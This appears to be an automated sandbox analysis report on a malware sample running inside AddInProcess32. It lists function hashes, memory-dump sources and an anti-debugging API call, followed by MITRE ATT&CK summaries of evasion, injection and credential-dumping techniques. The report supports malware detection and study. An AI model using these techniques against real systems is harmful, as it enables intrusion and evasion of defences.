Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2d0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: UM#$UM#
API String ID: 0-1061766205
Opcode ID: 8c80a536b1185c24561c28c142931a71c003a0b22398154980eb4776fa07f6ac
Instruction ID: eb3e06fdc7a2b14dc40b35f3a0b254467838111f8d4c9b0303dd4b5462c510f3
Opcode Fuzzy Hash: 8c80a536b1185c24561c28c142931a71c003a0b22398154980eb4776fa07f6ac
Instruction Fuzzy Hash: 25B17070E20209CFDF10DFA9C89579EBBF2AF88314F24812AD414AB394EB749C55CB85

Function 002D3908 Relevance: 2.7, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UM#, xrefs: 002D3947
UM#, xrefs: 002D3927

Memory Dump Source

Source File: 00000012.00000002.640446053.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2d0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: UM#$UM#
API String ID: 0-1061766205
Opcode ID: dd808f5b9748c22b15170bc20a0ee5feeb1f33179b5fb98f85058f049e87af94
Instruction ID: ff676f94509bdd89c93b0844127a5653b9aa0653eb127c5a899f611afef69381
Opcode Fuzzy Hash: dd808f5b9748c22b15170bc20a0ee5feeb1f33179b5fb98f85058f049e87af94
Instruction Fuzzy Hash: C8913A71E20209DFDB14CFA9C8857DDBBF2AF88314F14812AE445AB394EB749D55CB82

Function 002DE6E1 Relevance: 2.3, Strings: 1, Instructions: 1001COMMON

Download Yara Rule

Strings

($R, xrefs: 002DF44A

Memory Dump Source

Source File: 00000012.00000002.640446053.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2d0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: ($R
API String ID: 0-3180470068
Opcode ID: 14264b53bcaa1defa477446032eebc287e723bb861be99b3c384e7be28f8c050
Instruction ID: 51d3ca30811d131897f6e7b40eeaf8bf41acef2fd96df67202db72a42804b209
Opcode Fuzzy Hash: 14264b53bcaa1defa477446032eebc287e723bb861be99b3c384e7be28f8c050
Instruction Fuzzy Hash: 15922534A10205CFDB64EF68C584A5DBBF2EB45314F5688AAE40AEF361DB35EC95CB40

Function 002DC0F0 Relevance: 2.2, Instructions: 2231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.640446053.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2d0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aaa76f2b3d9cb8bc6f9e3f8b1cb58b2a44583ba22208f6929092b6c350d09d7
Instruction ID: e1adeb9e465822303a619e4123401f6b46c8e2a4f67a23131d13a46139f341b9
Opcode Fuzzy Hash: 3aaa76f2b3d9cb8bc6f9e3f8b1cb58b2a44583ba22208f6929092b6c350d09d7
Instruction Fuzzy Hash: 04331F31D1071A8ECB11EF68C8846ADF7B1FF99300F15C69AE459B7211EB70AAD5CB81

Function 002D8E68 Relevance: .9, Instructions: 895COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.640446053.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2d0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d38535339f6ba0bfe6f951008f47d2e870eea0395d259771777f615a4f154d5
Instruction ID: 825fb377aa897a4b172a1da74bf40627c793bbfa212d157bb2f2aa4b898bcfb5
Opcode Fuzzy Hash: 9d38535339f6ba0bfe6f951008f47d2e870eea0395d259771777f615a4f154d5
Instruction Fuzzy Hash: E3A2C231D20B1A8ADB51EF68C884599F7B1FF99300F11D79AE45877221EF70AAD4CB81

Function 00531E38 Relevance: .5, Instructions: 474
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e19ff0ba1dcc58759ce4c7bd4463d5aa2b22bcb097d0df2bf28dfbd5f1a692c8
Instruction ID: 031d1d826c5ef97e741ce8c0c5ca79d83db16028ab37af6c3e92436b52ca1086
Opcode Fuzzy Hash: e19ff0ba1dcc58759ce4c7bd4463d5aa2b22bcb097d0df2bf28dfbd5f1a692c8
Instruction Fuzzy Hash: 0B029F30B006198FDB14DF64D984B6EBBA6FF84310F14896AE806DB391DB35ED46CB80

Function 002D5328 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 002D53A7

Strings

UM#, xrefs: 002D534A

Memory Dump Source

Source File: 00000012.00000002.640446053.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2d0000_AddInProcess32.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID: UM#
API String ID: 3662101638-2795023639
Opcode ID: be2c7c9e6cef3ea44bf02932820b5825e5dd95dee7cf42224af764c11750fd75
Instruction ID: 4f9a4561b08bdb6143bbaee46956622414b3bb2745384f0f9f4ecb53ff452c18
Opcode Fuzzy Hash: be2c7c9e6cef3ea44bf02932820b5825e5dd95dee7cf42224af764c11750fd75
Instruction Fuzzy Hash: CF212AB1801219CFDB00CF99D5847EEBBF4AF49250F14846AE455B7350D778A944CF65

Function 00534C40 Relevance: 2.5, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

P3R, xrefs: 00534C5E
\9R, xrefs: 00534C9B

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID: P3R$\9R
API String ID: 0-3214118334
Opcode ID: 3c1504b97a82bd46ff9d50f5baed478649a0811b132c50f74343e94f534219a9
Instruction ID: 9390acd8eb283fea1f50f7c25522cd228ab2714ee6d7f2fbe507a603eea5a103
Opcode Fuzzy Hash: 3c1504b97a82bd46ff9d50f5baed478649a0811b132c50f74343e94f534219a9
Instruction Fuzzy Hash: AB0126317052984FCB215B79A82432E6FD6EFE3310F0509BEE046CB251C925ED428B52

Function 00531148 Relevance: 1.7, Strings: 1, Instructions: 405
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

&55p, xrefs: 005311A3

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID: &55p
API String ID: 0-1955183375
Opcode ID: aaa841f37532cf45cd213355417572babca229db5ca837beab0bc63cd4bf806f
Instruction ID: 34cef3ee3d4c233d9606e304a924076229dbae18848e54d91b481483cb078887
Opcode Fuzzy Hash: aaa841f37532cf45cd213355417572babca229db5ca837beab0bc63cd4bf806f
Instruction Fuzzy Hash: 41F11934A112048FDB18EFB5D595B6EBBB6FB84300F248569E4069B369CB35EC42CB94

Function 00531138 Relevance: 1.4, Strings: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

&55p, xrefs: 005311A3

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID: &55p
API String ID: 0-1955183375
Opcode ID: 96bc958ac21c2b3ff90c5e318b82687193e754ac29df76c744fd8c4151dbfc1b
Instruction ID: 9670576bd4c274733b5e60967fcb0e08555cae7428e5384f2dcc2b7478a584ae
Opcode Fuzzy Hash: 96bc958ac21c2b3ff90c5e318b82687193e754ac29df76c744fd8c4151dbfc1b
Instruction Fuzzy Hash: 12814B74A112048FDB14EFB5C595BAEBBB6FF84300F648529E4059B3A9CB35EC42CB94

Function 00530DC0 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1d0371c6879d610dea330cda620c9182862c42f33ad9564a6255e4e1a120f35
Instruction ID: 5dc33a33660aa2c2cbfdac645d964e248181078441ac23ed0b6d2d7f42f14a6a
Opcode Fuzzy Hash: a1d0371c6879d610dea330cda620c9182862c42f33ad9564a6255e4e1a120f35
Instruction Fuzzy Hash: B2A16E34A00614CFCB14EB64D598B9EBBF2FF84315F548969E40AAB390DB35ED42CB84

Function 00534D10 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 617031de0a0cac1d2c2df016cea1818297547e5ce9044c5a076eacef48297de0
Instruction ID: 76691be8a8e912a0b61d160f0f309e212b62afd35754ce28a6ef6413769437f2
Opcode Fuzzy Hash: 617031de0a0cac1d2c2df016cea1818297547e5ce9044c5a076eacef48297de0
Instruction Fuzzy Hash: 2381B435B002148FDF14AB78D8947AE7FA6FBD9310F24486AD406DB385DB35ED428B91

Function 00533218 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27f4c087452ccf4f7ee35303f9b526d265aee288c50834673900fc93af1f442b
Instruction ID: 26093f3d867d581ceca8392ce4655e1b18c4f06fef45d204439d26c21eb5c135
Opcode Fuzzy Hash: 27f4c087452ccf4f7ee35303f9b526d265aee288c50834673900fc93af1f442b
Instruction Fuzzy Hash: 9191FF34B002158FDB64DF65D995BAFBBE6BBC4300F10856AE819EB384EF70AD418B51

Function 00533208 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a46e9714f2bfc4d589d75d2be6dc15d434d709c8f135a31f379a263a8d0bb91
Instruction ID: b4d5202d6ab609a28396eb64c5b1b2baf165c271763c021ebfea83c164b2b43d
Opcode Fuzzy Hash: 6a46e9714f2bfc4d589d75d2be6dc15d434d709c8f135a31f379a263a8d0bb91
Instruction Fuzzy Hash: AF511D34B002058FDB54EF65D9A5B6F7BE6EBC4300F10856AE81ADB398EF70AD418B51

Function 00534D00 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3cfe258ccd191a90549e3296e020442bb7e4662188065b294b34dc74e182db6
Instruction ID: 84f55211dd51ba5583ee379632d6b1c578af024b3f002f8e2523683b02c51bce
Opcode Fuzzy Hash: d3cfe258ccd191a90549e3296e020442bb7e4662188065b294b34dc74e182db6
Instruction Fuzzy Hash: CB21E7357002148BDB20EB68D88436EBFA6FBD5320F148969D906DB385CB34FC519B92

Function 001DD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.640178708.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1dd000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68aeb82b6e037745ecbe5dd9d014ef072c4cdb939a3ea56e8066517fc1be1966
Instruction ID: d3e48c468d279b1813e9b4b4d6c13699cb644be0f2b2919848fc9e1e1bef5f73
Opcode Fuzzy Hash: 68aeb82b6e037745ecbe5dd9d014ef072c4cdb939a3ea56e8066517fc1be1966
Instruction Fuzzy Hash: F021B075604340DFEB14DF24E884B16BB65EB88314F34C6AAE8494B346C336D846CBA2

Function 00530DB0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eb9852647dbcc06a9ec84a74c5460c2c4ef385099e5b48dec39a046c476f4e8
Instruction ID: d3554ba80ba13ed2a652062e3a2fa745e6931e48cb37ab91a56ce1d8343493bb
Opcode Fuzzy Hash: 1eb9852647dbcc06a9ec84a74c5460c2c4ef385099e5b48dec39a046c476f4e8
Instruction Fuzzy Hash: 98219231B002149FCF14EB78E4A469EBFB6FB95310F14896AE405EB380D730AD46CB84

Function 00530006 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7b1b3324b5a0820213919d07a4925f0704a570915c1f2eb609d23e4da1b2268
Instruction ID: f81d01bd7d872dc873a691d9358c155d86094ad6cb1e7c1da5cf4a7f0a391c8f
Opcode Fuzzy Hash: b7b1b3324b5a0820213919d07a4925f0704a570915c1f2eb609d23e4da1b2268
Instruction Fuzzy Hash: 3621B43560D3C00FCB069B345C6469F7FB6AF97310F4940EBC885DB6D2EA58980A87A2

Function 005316DA Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c2b8b2975e04958dc2ba2076a1e55156638b93a562a32cdeaa31249a4eddc09
Instruction ID: b0ccae2148f32a397fed29c44a28bf93e0a367874b0122dc1bcf3cdf00083826
Opcode Fuzzy Hash: 1c2b8b2975e04958dc2ba2076a1e55156638b93a562a32cdeaa31249a4eddc09
Instruction Fuzzy Hash: 2A21B634A01609CFCB20DFA4D5C5AAEBBB6FF48355F248525E801AB759D730AC92CF54

Function 001DD006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.640178708.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1dd000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 569048c6796b1cacd8be165c5c36d5f60ed6897853c6d5da17354a119289c400
Instruction ID: 15d8b7ac5e1deaad35cd0d67ec272d7e905b3585c939104f710710c2a8183cf5
Opcode Fuzzy Hash: 569048c6796b1cacd8be165c5c36d5f60ed6897853c6d5da17354a119289c400
Instruction Fuzzy Hash: 112162755093808FDB12CF24D994715BF71EB85314F28C5DBD8498B657C33AD84ACB62

Function 00530040 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4c350027673c59eaa2df511b5354a21c12decaaa76d959dda042095654383fc
Instruction ID: a286cc79edbdc138a40723b1d7fe206d89ea25ecca324d22030ef4975815a79e
Opcode Fuzzy Hash: c4c350027673c59eaa2df511b5354a21c12decaaa76d959dda042095654383fc
Instruction Fuzzy Hash: 351152357041144FCB189A79D8596AF7BAAEBC8311F404536D806E7384DE25EC0187D1

Function 005343F0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b09c723831e41781643184a2c7d2b491c5291665463fd7b26996a5ed30fbe197
Instruction ID: 749b166acefe0c48bd199e8fe8ba86f3676fedad0aaf06a8664b02b048c85c41
Opcode Fuzzy Hash: b09c723831e41781643184a2c7d2b491c5291665463fd7b26996a5ed30fbe197
Instruction Fuzzy Hash: 1D0169317001144BDB24AA7CE894B6B7BD9EB99714F10883AE50ACB354EF32FC428B85

Function 005343EC Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48c9ae1f849152b0faae5f3e2f66414c28f6f00c296bf9d333fdda4e98fd540b
Instruction ID: 14c3637f388390385341370d3c0a4081bbe0f9453583501267241fa092f18e30
Opcode Fuzzy Hash: 48c9ae1f849152b0faae5f3e2f66414c28f6f00c296bf9d333fdda4e98fd540b
Instruction Fuzzy Hash: F2018C357001104BDB24AA7CE894B6B67D6EBD9714F10883AE10ECB754EF31FD428B85

Function 00532388 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20316f4dc64efac3f60c4b39f293cab84414dec6ef558557dc1c529ce55ebf0f
Instruction ID: 6ea27249f7e40cded6211469c2392bef342e437cad656385cc3ae2548aae52a6
Opcode Fuzzy Hash: 20316f4dc64efac3f60c4b39f293cab84414dec6ef558557dc1c529ce55ebf0f
Instruction Fuzzy Hash: 0EF08C36A04A14CFCF248E94EAC46AD7FB5FB50350F2408A2D902E7250D378AE82CB11

Non-executed Functions

Function 00531750 Relevance: 3.0, Strings: 2, Instructions: 468COMMON

Download Yara Rule

Strings

l#R, xrefs: 005318BD
($R, xrefs: 005318AB

Memory Dump Source

Source File: 00000012.00000002.641401500.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_530000_AddInProcess32.jbxd

Similarity

API ID:
String ID: ($R$l#R
API String ID: 0-3934338714
Opcode ID: 895eff522c30d95d1f0c55fd6d5f164900933949152438134c008d64622ed220
Instruction ID: f334e3e4680d8de106b71edc2bc596754c8c18385e9d4c00c0e82ef60bb7937a
Opcode Fuzzy Hash: 895eff522c30d95d1f0c55fd6d5f164900933949152438134c008d64622ed220
Instruction Fuzzy Hash: D4120B34A01619CFDB24DFB5C895A9DBBB6FF85300F20856AD40AAB355DB30AD81CF84

Function 002D3C50 Relevance: 2.8, Strings: 2, Instructions: 281COMMON

Download Yara Rule

Strings

UM#, xrefs: 002D3C6F
UM#, xrefs: 002D3C8F

Memory Dump Source

Source File: 00000012.00000002.640446053.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2d0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: UM#$UM#
API String ID: 0-1061766205
Opcode ID: 16ce15719bee9c262f7030b117bb35a83e1123ce4f30edc7af163b0d88753738
Instruction ID: cf152e09712c51428ed3fb6d3324a74a7e945e2b97658110e1044337f35b48b4
Opcode Fuzzy Hash: 16ce15719bee9c262f7030b117bb35a83e1123ce4f30edc7af163b0d88753738
Instruction Fuzzy Hash: 0BB14D70E10209CFDB14CFA9D88579EBBF2AF88314F14812AE815A7394EB749D55CF82

Function 002D3C45 Relevance: 2.8, Strings: 2, Instructions: 275COMMON

Download Yara Rule

Strings

UM#, xrefs: 002D3C6F
UM#, xrefs: 002D3C8F

Memory Dump Source

Source File: 00000012.00000002.640446053.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2d0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: UM#$UM#
API String ID: 0-1061766205
Opcode ID: c3e632e851a74fa185771f8a3063c69658b8762a7d8cf050592fa33ff82f45ee
Instruction ID: e9bc97c1aaac33a5e946bc47964b5178b9fcd8aeedf35013051aca7771aecfde
Opcode Fuzzy Hash: c3e632e851a74fa185771f8a3063c69658b8762a7d8cf050592fa33ff82f45ee
Instruction Fuzzy Hash: 67B14F70E20209CFDB10CFA9C88579EBBF2AF88314F14812AE415A7394DB749D55CF92

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

